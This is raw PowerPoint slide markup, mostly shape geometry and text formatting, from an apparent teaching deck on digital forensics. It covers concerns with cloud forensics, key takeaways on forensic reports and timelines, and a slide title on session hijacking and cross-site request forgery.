                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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17BE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317998" y="6276593"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229361"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361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2540000" y="1882292"/>
            <a:ext cx="11131550" cy="326580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4999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3808095" algn="l"/>
              </a:tabLst>
            </a:pP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Forensics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public</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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cloud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are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complicated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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by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permitting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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>right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dirty="0" sz="2200" spc="-1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audit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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>an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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>user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by </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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SLA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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>with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cloud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provider.	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Concerns </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>with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forensics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examinations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cloud-hosted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processing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data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services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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>are: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300">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2708910">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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120">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>limited</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>opportunities</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ephemeral</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>images.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000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3460115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2615"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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120">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>complex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>chain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>custody</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>issues.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36209" y="6358585"/>
            <a:ext cx="6901815" cy="14458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63905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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120">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>complex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>regulatory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>jurisdiction</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>issues.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425"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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135">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bound</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>breach</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80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44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>notification</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>laws.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25267" y="4779264"/>
            <a:ext cx="1941576" cy="19431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02508" y="1187196"/>
            <a:ext cx="3974591" cy="36575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07916" y="784098"/>
            <a:ext cx="272605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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaways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2211323"/>
            <a:ext cx="457200" cy="4572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3581400"/>
            <a:ext cx="457200" cy="4572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4835652"/>
            <a:ext cx="457200" cy="4572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85697" y="2209783"/>
            <a:ext cx="8722995" cy="4577080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dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital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forensics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refers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to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>collection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evidence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from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computer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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>standard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format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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acceptable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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>court.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1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200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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forensics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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>reports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simply</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>summarize</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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contents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2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital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data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conclusions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from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investigator's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analysis.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100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2343785">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30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7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visual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representation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>events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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>happening</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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chronological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order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is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>timeline.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700">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="897890">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Digital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forensics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software is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>designed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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>assist </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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dirty="0" sz="2200" spc="2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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>documentation,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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8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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>digital</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence.</a:t>
            </a:r>
            <a:endParaRPr sz="22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6054852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95776" y="306451"/>
            <a:ext cx="866330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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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5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dirty="0" spc="-5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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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37378" y="1933193"/>
            <a:ext cx="578612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Ses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ion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jacki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7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ca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done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thr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way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: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1407" y="760476"/>
            <a:ext cx="12202668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526345" y="3308413"/>
            <a:ext cx="10508615" cy="1223010"/>
            <a:chOff x="3526345" y="3308413"/>
            <a:chExt cx="10508615" cy="1223010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3531108" y="3313176"/>
              <a:ext cx="10499090" cy="1213485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1213485">
                  <a:moveTo>
                    <a:pt x="10296652" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="202183" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155834" y="5341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113281" y="20555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75740" y="44427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44427" y="75740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20555" y="113281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5341" y="155834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="202184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1010920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5341" y="1057269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20555" y="1099822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44427" y="1137363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75740" y="1168676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113281" y="1192548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155834" y="1207762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202183" y="1213103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296652" y="1213103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343001" y="1207762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385554" y="1192548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423095" y="1168676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454408" y="1137363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478280" y="1099822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493494" y="1057269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="1010920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="202184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493494" y="155834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478280" y="113281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454408" y="75740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423095" y="44427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385554" y="20555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343001" y="5341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296652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531108" y="3313176"/>
              <a:ext cx="10499090" cy="1213485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10499090" h="1213485">
                  <a:moveTo>
                    <a:pt x="0" y="202184"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5341" y="155834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20555" y="113281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44427" y="75740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75740" y="44427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113281" y="20555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155834" y="5341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202183" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10296652" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10343001" y="5341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10385554" y="20555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423095" y="44427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454408" y="75740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478280" y="113281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493494" y="155834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="202184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10498836" y="1010920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10493494" y="1057269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10478280" y="1099822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10454408" y="1137363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10423095" y="1168676"/>
                  </a:lnTo>
                  <a:lnTo>
